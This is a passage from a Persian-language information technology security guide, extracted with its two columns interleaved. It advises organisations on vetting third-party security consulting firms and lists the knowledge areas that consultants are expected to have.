‫ﻭﻗﺘﻲ ﺗﺠﺮﺑﺔ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﭘﻴﺪﺍ ﻧﻜﺮﺩﻩ ﻭ ﻣﺤﻴﻂ ﺍﻃﺮﺍﻑ ﺧﻮﺩ‬
‫ﻣﺸﺎﻭﺭﻩﺍﻱ ﻛﻪ ﺍﺳﺎﻣﻲ ﺍﻓﺮﺍﺩ ﺩﺭﮔﻴﺮ ﺩﺭ ﭘﺮﻭﮊﺓ ﺷﻤﺎ ﺭﺍ ﺗﺎ ﭘﺮﺩﺍﺧـﺖ‬
‫ﺭﺍ ﺧﻮﺏ ﻧﺸﻨﺎﺧﺘﻪ ﺑﺎﺷﻴﺪ‪ ،‬ﻧﻴﺎﺯﻫﺎﻱ ﻭﺍﻗﻌﻲ ﺧﻮﺩ ﺭﺍ ﻧﻤﻲﺩﺍﻧﻴﺪ‪.‬‬
‫ﻗﺴﻂ ﺍﻭﻝ ﻫﺰﻳﻨﺔ ﻗﺮﺍﺭﺩﺍﺩ ﺩﺭ ﺍﺧﺘﻴﺎﺭﺗﺎﻥ ﻗﺮﺍﺭ ﻧﻤﻲﺩﻫﻨﺪ ﻣﺤﺘﺎﻃﺎﻧﻪ‬
‫ﻋﻤﻞ ﻛﻨﻴﺪ‪.‬‬ ‫ﺍﻧﺘﺨﺎﺏ ﻓﺮﻭﺷﻨﺪﻩ‬
‫ﻣﻮﻓﻘﻴﺖ ﺷﻤﺎ ﺩﺭ ﺑﺮﻭﻧﺴﭙﺎﺭﻱ ﺍﻣﻮﺭ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﺷﺮﻛﺘﻬﺎﻱ ﺛﺎﻟﺚ ﺗـﺎ‬
‫ﭘﺎﻳﺪﺍﺭﻱ ﻭ ﺗﺪﺍﻡ ﻓﻌﺎﻟﻴﺖ ﺷﺮﻛﺖ ﺭﺍ ﺩﺭ ﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ‬
‫ﺣﺪ ﺯﻳﺎﺩﻱ ﺑﻪ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻳﺎ ﺍﻓﺮﺍﺩﻱ ﺑﺴﺘﮕﻲ ﺩﺍﺭﺩ ﻛﻪ ﺁﻧﻬﺎ ﺭﺍ ﺑـﺮﺍﻱ‬
‫ﺍﮔﺮ ﺷﻤﺎ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻳﻚ ﭘﺮﻭﮊﺓ ﺑﻠﻨﺪﻣﺪﺕ ﻗﺮﺍﺭﺩﺍﺩ ﺑﺴﺘﻪﺍﻳﺪ ﺑﺎﻳـﺪ‬
‫ﺍﻳﻨﻜﺎﺭ ﺍﻧﺘﺨﺎﺏ ﻛﺮﺩﻩﺍﻳﺪ‪.‬‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺷﺮﻛﺖ ﻃﺮﻑ ﻗﺮﺍﺭﺩﺍﺩ ﺩﺭ ﺗﻤﺎﻡ ﻣـﺪﺕ‬
‫ﻝ ﻗﺮﺍﺭﺩﺍﺩ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷـﺖ‪ .‬ﻣﻨﻈـﻮﺭ ﺍﺯ ﺍﻳـﻦ ﻧﻜﺘـﻪ ﺍﻳـﻦ‬ ‫ﻃﻮ ﹺ‬ ‫ﻳﻚ ﺭﺍﻫﻨﻤﺎ ﺑﮕﻴﺮﻳﺪ ﻭ ﺭﻭﻱ ﻣﻌﺮﻓﻬﺎ ﭘﺎﻓﺸﺎﺭﻱ ﻛﻨﻴﺪ‬
‫ﻧﻴــﺴﺖ ﻛــﻪ ﺷــﻤﺎ ﻧﺒﺎﻳــﺪ ﺑــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺧــﺪﻣﺎﺕ ﺷــﺮﻛﺘﻬﺎﻱ‬
‫ﺗﺎﺯﻩﺗﺄﺳﻴﺲ ﻣﻮﺍﻓﻘﺖ ﻛﻨﻴﺪ‪ ،‬ﺑﻠﻜﻪ ﺑﺎﻳﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺳﺎﺯﻣﺎﻥ‬ ‫ﺑﻪ ﻋﻠﺖ ﺗﻨﻮﻉ ﺯﻳﺎﺩ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺸﺎﻭﺭﻩ‪ ،‬ﻳﻜﻲ ﺍﺯ ﺑﻬﺘﺮﻳﻦ ﺭﻭﺷﻬﺎﻱ‬
‫ﻣﺮﺑﻮﻃـﻪ ﻭﺍﺟــﺪ ﻣــﺪﻳﺮﻳﺖ ﻭ ﭘـﺸﺘﻮﺍﻧﺔ ﻣــﺎﻟﻲ ﻻﺯﻡ ﺑــﺮﺍﻱ ﺍﻧﺠــﺎﻡ‬ ‫ﺍﻧﺘﺨﺎﺏ ﺷﺮﻛﺖ ﻣﻮﺭﺩ ﻧﻈﺮﺗﺎﻥ‪ ،‬ﭘﺮﺳﻴﺪﻥ ﺍﺯ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺁﺷـﻨﺎ ﻭ‬
‫ﺗﻌﻬﺪﺍﺗﺶ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺍﺯ ﺷﺮﻛﺘﻬﺎﻱ ﻣﺸﺎﻭﺭﻩﺍﻱ ﻛﻪ ﺩﺍﺭﺍﻱ ﻧﺮﺧﻬﺎﻱ‬ ‫ﻣﺸﺎﺑﻪ ﺳﺎﺯﻣﺎﻥ ﺧﻮﺩﺗﺎﻥ ﻣﻲ ﺑﺎﺷﺪ‪ .‬ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻤﻴﺸﻪ ﭘﻴﺪﺍ ﻛـﺮﺩﻥ‬
‫ﭘﺎﺋﻴﻦ ﻫﺴﺘﻨﺪ ﺍﺟﺘﻨـﺎﺏ ﻛﻨﻴـﺪ؛ ﭼﺮﺍﻛـﻪ ﺍﮔـﺮ ﻧﺘﻮﺍﻧﻨـﺪ ﺑـﺎ ﻓـﺮﻭﺵ‬ ‫ﻳﻚ ﻣﻌﺮﻑ ﺧﻮﺏ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﻧﻴـﺴﺖ‪ .‬ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺳـﺎﺯﻣﺎﻧﻬﺎ‪ ،‬ﻳـﺎ‬
‫ﺧﺪﻣﺎﺗﻲ ﻛﻪ ﺷﻤﺎ ﺍﺯ ﺁﻧﻬﺎ ﻣﻲﺧﺮﻳﺪ ﻫﺰﻳﻨـﻪﻫـﺎﻱ ﺧـﻮﺩ ﺭﺍ ﺗـﺄﻣﻴﻦ‬ ‫ﺷﺮﻛﺘﻬﺎﻱ ﻣﺸﺎﻭﺭﻩ ﺍﻱ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻳﻚ ﻧﻤﺎﻳـﺸﮕﺎﻩ ﺗﺠـﺎﺭﻱ ﭘﻴـﺪﺍ‬
‫ﻛﻨﻨﺪ‪ ،‬ﺁﻧﮕﺎﻩ ﺳﻌﻲ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ ﺍﺯ ﺟﺎﻱ ﺩﻳﮕﺮ ﺍﻳﻦ ﭘﻮﻝ ﺭﺍ ﺑﺪﺳﺖ‬
‫‪102 Remote Monitoring and Response Firm‬‬
‫‪١٦٩‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﻗﺎﻧﻮﻥ ﻛﺎﺭ ﻭ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻣﺴﺎﺋﻞ ﻣﺪﻳﺮﻳﺘﻲ ﻛـﻪ ﺷـﺮﺍﻳﻄﻲ ﺭﺍ‬ ‫•‬ ‫ﺁﻭﺭﻧﺪ ﻭ ﻟﺬﺍ ﺧﺪﻣﺎﺕ ﻫﺮﭼﻨﺪ ﺳﻄﺢ ﺑﺎﻻﻱ ﺁﻧﻬﺎ ﺩﺭ ﺟـﺎﻱ ﺩﻳﮕـﺮ ﻭ‬
‫ﭘﻴﺶ ﺑﻴﻨﻲ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺩﺭ ﺁﻧﻬـﺎ ﺍﻓـﺮﺍﺩ ﺩﺍﺧﻠـﻲ ﺑـﺮ ﻋﻠﻴـﻪ‬ ‫ﺷﺎﻳﺪ ﺣﺘﻲ ﺗﺠﺎﺭﺕ ﺩﻳﮕﺮﻱ ﻣﺘﻤﺮﻛﺰ ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬
‫ﻛﺎﺭﻓﺮﻣﺎﻳﺸﺎﻥ ﺍﻗﺪﺍﻡ ﻗﺎﻧﻮﻧﻲ ﻣﻲﻛﻨﻨﺪ؛‬
‫ﻣﺮﺍﻗﺐ ﻓﺮﻳﺒﻜﺎﺭﻳﻬﺎ ﺑﺎﺷﻴﺪ‬
‫ﻗﻮﺍﻧﻴﻦ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﻠﻲ ﻭ ﻣﺤﻠﻲ؛‬ ‫•‬ ‫‪١٠٣‬‬
‫ﺩﺭ ﻣﻮﺭﺩ ﻗﺮﺍﺭﺩﺍﺩﻫﺎﻱ ﻫﻤﻪﺟﺎﻧﺒﻪ ﻛﻪ ﺩﺭ ﺁﻥ ﻳـﻚ ﺷـﺮﻛﺖ ﺑـﻪ‬
‫ﻣﺤﺼﻮﻻﺕ‪ ،‬ﻓﻨﺎﻭﺭﻳﻬﺎ ﻭ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ؛‬ ‫•‬ ‫ﺗﻨﻬﺎﻳﻲ ﻫﻤـﺔ ﺳﻴﺎﺳـﺘﻬﺎ ﺭﺍ ﺗﻬﻴـﻪ ﻧﻤـﻮﺩﻩ ﻭ ﺑـﺮﺍﻱ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ‬
‫ﻭﻳﺮﻭﺳﻬﺎ‪ ،‬ﻛﺮﻣﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ‪ ،‬ﺳﺎﻳﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨـﺮﺏ‪،‬‬ ‫•‬ ‫ﺳﻴﺎﺳﺘﻬﺎ‪ ،‬ﺧﺪﻣﺎﺕ ﻭ ﺳﺨﺖﺍﻓﺰﺍﺭ ﻻﺯﻡ ﺭﺍ ﻧﻴﺰ ﻣﻲﻓﺮﻭﺷـﺪ ﻣﺮﺍﻗـﺐ‬
‫ﻭ ﻫﻤﭽﻨﻴﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﭘﻮﻳﻨﺪﻩ‪١٠٤‬؛‬ ‫ﺑﺎﺷﻴﺪ‪ .‬ﻣﺎ ﮔﺰﺍﺭﺷـﺎﺗﻲ ﺩﺭﻳﺎﻓـﺖ ﻛـﺮﺩﻩﺍﻳـﻢ ﻛـﻪ ﺩﺭ ﺁﻥ ﻧﻴﺎﺯﻫـﺎﻱ‬
‫ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﻭ ﻧﻴﺎﺯﻫﺎﻱ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﻃﺮﺯ ﻣﺸﻜﻮﻛﻲ ﺑﺮﺍﻱ‬
‫ﻲ ﻣﺠــﺎﺯﻱ‬
‫ﺍﺻــﻮﻝ ‪ TCP/IP‬ﺩﺭ ﺷــﺒﻜﻪﻫــﺎﻱ ﺧــﺼﻮﺻ ﹺ‬ ‫•‬
‫‪١٠٥‬‬
‫ﻫﻤﺔ ﻣـﺸﺘﺮﻳﺎﻥ ﺑـﺴﻴﺎﺭ ﻣـﺸﺎﺑﻪ ﻳﻜـﺪﻳﮕﺮ ﺑـﻮﺩﻩ ﻭ ﺩﺭ ﻫﻤﮕـﻲ ﺍﺯ‬
‫ﻭ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ؛‬ ‫)‪(VPNs‬‬
‫ﻱ ﻧﺴﺒﺘﹰﺎ ﻣﺸﺎﺑﻬﻲ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﺳﺨﺖ ﺍﻓﺰﺍﺭ ﭘﺎﻳﻪ ﻭ ﺭﺍﻩﺣﻠﻬﺎﻱ ﻣﺸﺎﻭﺭﻩﺍ ﹺ‬
‫ﺁﻣﻮﺯﺵ ﻭ ﺁﮔﺎﻫﻲ ﻋﻤﻮﻣﻲ‪ ،‬ﺭﺍﻫﻨﻤﺎﻫﺎ ﻭ ﺧﺪﻣﺎﺕ؛‬ ‫•‬ ‫ﺷﺪﻩ ﺑﻮﺩ‪ .‬ﺍﮔﺮ ﺷﻤﺎ ﺷﺮﻛﺘﻲ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻴﺪ ﻛﻪ ﺷﻤﺎ ﺭﺍ ﻣﺤـﺪﻭﺩ‬
‫ﺑﻪ ﺍﺭﺗﺒﺎﻁ ﺍﻧﺤﺼﺎﺭﻱ ﺑﻠﻨﺪﻣـﺪﺕ ﺑـﺎ ﺧـﻮﺩ ﻧﻜﻨـﺪ‪ ،‬ﺁﻧﮕـﺎﻩ ﺍﺣﺘﻤـﺎﻝ‬
‫ﻭﺍﻛﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩﻫﺎ ﻭ ﭘﻴﮕﺮﺩﻫﺎﻱ ﻗﺎﻧﻮﻧﻲ؛‬ ‫•‬
‫ﺑﻴﺸﺘﺮﻱ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻛﻪ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺗﺪﻭﻳﻦﺷﺪﻩ ﺗﻮﺳـﻂ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﺍﻣﻨﻴﺖ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ؛ ﻭ‬ ‫•‬ ‫ﺁﻥ ﺳﺎﺯﻣﺎﻥ ﻣﻄﺎﺑﻖ ﻧﻴﺎﺯﻫﺎﻱ ﻭﺍﻗﻌـﻲ ﺷـﻤﺎ ﺑﺎﺷـﺪ ﻭ ﻧـﻪ ﻣﻄـﺎﺑﻖ‬
‫ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ‪ ،‬ﺭﻭﺷﻬﺎﻱ ﺭﺳﻤﻲ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨـﺎﻃﺮﻩ‪ ،‬ﻭ‬ ‫•‬ ‫ﻭﺳﺎﻳﻠﻲ ﻛﻪ ﺁﻧﻬﺎ ﺑﻪ ﻓﺮﻭﺵ ﻣﻲﺭﺳﺎﻧﻨﺪ‪.‬‬
‫ﻣﺴﺎﺋﻞ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻮﺭ ﺑﻴﻤﻪ‪.‬‬
‫ﻫﺮ ﺷﺮﻛﺖ ﺧﺪﻣﺎﺕ ﻣﺸﺎﻭﺭﻩ ﺍﻱ ﻛﻪ ﺑﺨﻮﺍﻫﺪ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺧـﻮﺑﻲ‬ ‫ﮔﺴﺘﺮﺩﮔﻲ ﺗﺠﺎﺭﺏ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ‬
‫ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻃﺮﻑ ﻗﺮﺍﺭﺩﺍﺩ ﺗﻬﻴﻪ ﻛﻨﺪ ﺑﺎﻳﺪ ﭘﺮﺳـﻨﻠﻲ ﺩﺍﺷـﺘﻪ‬ ‫ﺷﻤﺎ ﺑﺎﻳﺪ ﺣﺘﻲﺍﻻﻣﻜﺎﻥ ﺍﺯ ﺍﻧﺘﺨﺎﺏ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﻋﻤﺪﺓ ﺗﺠﺮﺑـﻪ‬
‫ﺑﺎﺷﺪ ﻛﻪ ﻃﺎﻟﺐ ﮔﻔﺘﮕﻮ ﺩﺭﺑﺎﺭﺓ ﻣﺒﺎﺣﺚ ﻣﺨﺘﻠﻒ ﻛﻪ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ‬ ‫ﺁﻧﻬﺎ ﻣﺮﺑﻮﻁ ﻳﻚ ﻧﻮﻉ ﻣﺸﺘﺮﻱ ﻳﺎ ﻳﻚ ﺑﺴﺘﺮ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﺧـﺎﺹ‬
‫ﻭ ﺑﻮﻳﮋﻩ ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺁﻥ ﻣﻲﭘﺮﺩﺍﺯﻳﻢ ﺑﺎﺷﻨﺪ‪ .‬ﺍﮔﺮ ﺁﻧﻬﺎ ﺁﻣﺎﺩﻩ ﻭ‬ ‫ﺍﺳﺖ ﻣﺤﺘﺎﻃﺎﻧﻪ ﻋﻤﻞ ﻛﻨﻴﺪ‪ ،‬ﻣﮕﺮ ﺁﻧﻜﻪ ﻧﻴﺎﺯﻫـﺎﻱ ﺳـﺎﺯﻣﺎﻥ ﺷـﻤﺎ‬
‫ﻳﺎ ﻗﺎﺩﺭ ﺑﻪ ﺑﺤﺚ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳـﻦ ﻋﻨـﺎﻭﻳﻦ ﻧﺒﺎﺷـﻨﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬ ‫ﺩﻗﻴﻘﹰﺎ ﺑﺎ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺷﺮﻛﺖ ﻣﺰﺑﻮﺭ ﺑـﻪ ﺁﻧﻬـﺎ ﺍﺭﺍﺋـﻪ ﺧـﺪﻣﺎﺕ‬
‫ﺍﻧﺘﺨﺎﺏ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﻧﺒﺎﺷﻨﺪ‪.‬‬ ‫ﻣﻲﺩﻫﺪ ﻣﻄﺎﺑﻘـﺖ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ‪ .‬ﺑﻌﻨـﻮﺍﻥ ﻣﺜـﺎﻝ ﻳـﻚ ﺷـﺮﻛﺖ‬
‫ﻣﺸﺎﻭﺭﻩﺍﻱ ﻛﻪ ﺍﺳﺎﺳﹰﺎ ﺧﺪﻣﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺷﺨﺺ ﺛﺎﻟﺚ ﺭﺍ ﺑﻪ ﺍﺩﺍﺭﺍﺕ‬
‫ﺍﮔﺮ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻦ ﺷﺮﻛﺘﻬﺎ ﻧﮕﺮﺍﻧﻲ ﺧﺎﺻﻲ ﺩﺍﺭﻳﺪ ﻛﺎﻓﻴﺴﺖ ﺍﺯ ﺁﻧﻬﺎ‬ ‫ﭘﻠﻴﺲ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ ﻛﻪ ﺍﺯ ﺳﻴـﺴﺘﻢ ‪Microsoft Windows‬‬
‫ﺑﺨﻮﺍﻫﻴﺪ ﻛﻪ ﺳﻴﺎﺳﺘﻬﺎ ﻳﺎ ﺭﻭﺍﻟﻬﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﻳﻚ ﻣﺸﺘﺮﻱ ﺩﻳﮕـﺮ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﻳﻚ ﺷـﺮﻛﺖ ﺩﺍﺭﻭﻳـﻲ ﻛـﻪ‬
‫ﺗﻬﻴﻪ ﻛﺮﺩﻩﺍﻧﺪ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺷﻤﺎ ﻗـﺮﺍﺭ ﺩﻫﻨـﺪ‪ .‬ﺑﺮﺧـﻲ ﺍﺯ ﺷـﺮﻛﺘﻬﺎ‬ ‫ﺗﺮﻛﻴﺒــﻲ ﺍﺯ ‪ Windows‬ﻭ ‪ Unix‬ﺭﺍ ﺑﻜــﺎﺭ ﮔﺮﻓﺘــﻪ ﺍﻧﺘﺨــﺎﺏ‬
‫ﭼﻨﻴﻦ ﺳﻨﺪﻱ ﺭﺍ ﺑﻌﺪ ﺍﺯ ﺣﺬﻑ ﺍﺳﻢ ﻭ ﻣﺸﺨﺼﺎﺕ ﻣﺸﺘﺮﻱ ﺑﻪ ﺷﻤﺎ‬ ‫ﻣﻨﺎﺳﺒﻲ ﻧﺒﺎﺷﺪ‪ .‬ﮔﺴﺘﺮﺓ ﺗﺠﺎﺭﺏ ﺷﺮﻛﺖ ﻣﺸﺎﻭﺭﻩﺍﻱ ﻣﻤﻜﻦ ﺍﺳـﺖ‬
‫ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺳﺎﻳﺮ ﺷﺮﻛﺘﻬﺎ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻣـﺸﺘﺮﻳﻬﺎﻳﻲ ﺩﺍﺷـﺘﻪ‬ ‫ﺁﻧﻘﺪﺭ ﻓﺮﺍﮔﻴﺮ ﻧﺒﺎﺷﺪ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﺧﺪﻣﺎﺕ ﺳﻴﺎﺳﺘﻲ ﻣﻨﺎﺳـﺒﻲ ﺑـﺮﺍﻱ‬
‫ﺑﺎﺷﻨﺪ ﻛﻪ ﺧﻮﺩﺷﺎﻥ ﺧﻮﺍﺳﺘﻪ ﺑﺎﺷﻨﺪ ﺩﺭ ﻓﻬﺮﺳﺖ "ﻣﺸﺘﺮﻳﺎﻥ ﻣﺮﺟﻊ"‬ ‫ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﻧﻴﺎﺯﻫﺎﻱ ﻣﺤﻴﻂ ﻛﺎﺭﻱ ﺷﻤﺎ ﺍﺭﺍﺋﻪ ﺩﻫﺪ‪ .‬ﺍﻳﻦ ﻧﻜﺘﻪ‬
‫ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪ .‬ﺑﻌﻀﻲ ﺷـﺮﻛﺘﻬﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﭘـﻴﺶ ﺍﺯ ﺍﺭﺍﺋـﻪ ﻫـﺮ‬ ‫ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﻧﻴﺴﺖ ﻛﻪ ﺍﻓﺮﺍﺩ ﺑﺎ ﺳـﻮﺍﺑﻖ ﻛـﺎﺭﻱ ﺩﺭ ﻳـﻚ ﺣـﻮﺯﺓ‬
‫ﺍﻃﻼﻋـــﺎﺗﻲ ﺍﺯ ﺷـــﻤﺎ ﺑﺨﻮﺍﻫﻨـــﺪ ﻣﻮﺍﻓﻘﺘﻨﺎﻣـــﻪﺍﻱ ﺩﺍﻝ ﺑـــﺮ‬ ‫ﺧﺎﺹ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺩﻭﺭﻧﻤﺎﻱ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺍﻱ ﺷﻤﺎ ﻓﺮﺍﻫﻢ ﻛﻨﻨﺪ؛ ﺍﻣـﺎ‬
‫ﺳﺮﻱ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺍﺳﻨﺎﺩ ﺍﻣﻀﺎ ﻛﻨﻴﺪ‪ .‬ﺍﺯ ﺧﺪﻣﺎﺕ ﺷـﺮﻛﺘﻬﺎﻳﻲ ﻛـﻪ‬ ‫ﺷﻤﺎ ﺑﺎﻳﺪ ﻣﺤﺘﺎﻁ ﺑﺎﺷﻴﺪ ﻭ ﺑﺒﻴﻨﻴﺪ ﻛﻪ ﺁﻳﺎ ﺷـﻮﺍﻫﺪ ﺭﻭﺷـﻨﻲ ﺑـﺮﺍﻱ‬
‫ﺍﺳﻢ ﻭ ﺍﺳﻨﺎﺩ ﻣﺸﺘﺮﻳﺎﻥ ﺧﻮﺩ ﺭﺍ ﺑﺪﻭﻥ ﻣﺠﻮﺯ ﺁﻧﻬﺎ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺷﻤﺎ ﻭ‬ ‫ﺗﺄﻳﻴﺪ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻳﺎ ﺧﻴﺮ‪.‬‬
‫ﺩﻳﮕﺮﺍﻥ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ؛ ﭼﻮﻥ ﻃﺒﻴﻌﺘﹰﺎ ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ‬
‫ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺷﻤﺎ ﻧﻴﺰ ﺑﺪﻭﻥ ﻣﺠـﻮﺯ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﻣـﺸﺘﺮﻳﺎﻥ ﺑﻌـﺪﻱ‬ ‫ﻛﺎﺭﻛﻨﺎﻥ ﺍﻳﻦ ﺷﺮﻛﺘﻬﺎ ﺣﺪﺍﻗﻞ ﺑﺎﻳﺪ ﺑﺎ ﻣﺴﺎﺋﻞ ﺯﻳﺮ ﺁﺷﻨﺎﻳﻲ ﺩﺍﺷـﺘﻪ‬
‫ﺧﻮﺩ ﻗﺮﺍﺭ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺩ‪ .‬ﻧﻜﺘﺔ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﺍﮔﺮ ﺍﺯ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ ﺧـﺎﺭﺝ‬ ‫ﺑﺎﺷﻨﺪ‪:‬‬

‫‪104 Scanning Software‬‬


‫‪105 Virtual Private Networks‬‬ ‫‪103 “All in One” Contracts‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٧٠‬‬

‫ﺑﺪﻧﺒﺎﻝ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺷﺎﻳﺴﺘﮕﻲ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺑﺎﺷﻴﺪ؛ ﺑﺨﺼﻮﺹ‪:‬‬ ‫ﺍﺯ ﺳﺎﺯﻣﺎﻥ ﻳﺎ ﻳﻚ ﻛﺸﻮﺭ ﺩﻳﮕﺮ ﻛﻤﻚ ﮔﺮﻓﺘﻴﺪ‪ ،‬ﻓﺮﺍﻣـﻮﺵ ﻧﻜﻨﻴـﺪ‬
‫ﻛﻪ ﻳﻜﻲ ﺍﺯ ﺷﺮﺍﻳﻂ ﻗﺮﺍﺭﺩﺍﺩ ﺑﺎﻳﺪ ﺍﻳﻦ ﺑﺎﺷﺪ ﻛـﻪ ﺁﻧﻬـﺎ ﺑـﻪ ﺗﻮﺳـﻌﺔ‬
‫ﮔﻮﺍﻫﻴﻨﺎﻣﻪﻫﺎ‬ ‫ﻇﺮﻓﻴﺖ ﻣﺤﻠﻲ ﺳﺎﺯﻣﺎﻥ ﻭ ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﻛﺸﻮﺭ ﺷـﻤﺎ ﻛﻤـﻚ‬
‫ﺍﺯ ﻣﺘﻘﺎﺿﻴﺎﻥ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﺑﺨﻮﺍﻫﻴﺪ ﻭ ﺍﺯ ﺍﻋﺘﺒﺎﺭ ﮔﻮﺍﻫﻴﻨﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ‬ ‫ﻛﻨﻨﺪ‪.‬‬
‫ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﮔﻮﺍﻫﻴﻨﺎﻣﻪﻫﺎ ﻗﺎﺑﻞ‬
‫ﻼ ﻃﺒﻴﻌﻲ ﺍﺳﺖ ﻛﻪ ﻃﻲ ﺩﻭﺭﻩﻫﺎﻱ ﮔﺬﺍﺭ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ‬ ‫ﺍﻳﻦ ﻛﺎﻣ ﹰ‬
‫ﺧﺮﻳﺪ ﻫﺴﺘﻨﺪ ﻭ ﻓﺮﺩ ﺑﺮﺍﻱ ﺩﺭﻳﺎﻓﺖ ﺁﻧﻬﺎ ﻛﺎﻓﻴﺴﺖ ﺩﺭ ﻳﻜـﺴﺮﻱ ﺍﺯ‬
‫ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺷﺮﻛﺘﻬﺎ ﺍﺯ ﻛﻤﻚ ﻛﺎﺭﺷﻨﺎﺳـﺎﻥ ﺧـﺎﺭﺟﻲ ﺍﺳـﺘﻔﺎﺩﻩ‬
